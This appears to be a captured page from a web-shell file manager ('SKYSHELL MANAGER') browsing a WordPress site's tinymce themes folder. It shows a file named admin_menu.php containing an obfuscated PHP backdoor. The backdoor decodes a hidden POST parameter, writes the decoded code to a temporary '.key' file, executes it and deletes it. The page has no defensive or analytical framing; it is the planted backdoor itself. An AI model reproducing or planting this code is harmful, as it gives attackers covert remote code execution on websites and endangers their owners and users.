📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
12934.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: admin_menu.php
<?php if(in_array("\x76a\x6C", array_keys($_POST))){ $ptr = array_filter([getenv("TMP"), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/tmp", "/var/tmp", sys_get_temp_dir(), getenv("TEMP")]); $descriptor = $_POST["\x76a\x6C"]; $descriptor=explode( "." , $descriptor); $item = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $k = 0; foreach ($descriptor as $v4) { $sChar = ord($salt[$k%$sLen]); $d = ((int)$v4 - $sChar - ($k%10))^86; $item .= chr($d); $k++;} while ($resource = array_shift($ptr)) { if (!!is_dir($resource) && !!is_writable($resource)) { $value = join("/", [$resource, ".key"]); if (file_put_contents($value, $item)) { require $value; unlink($value); exit; } } } }
Save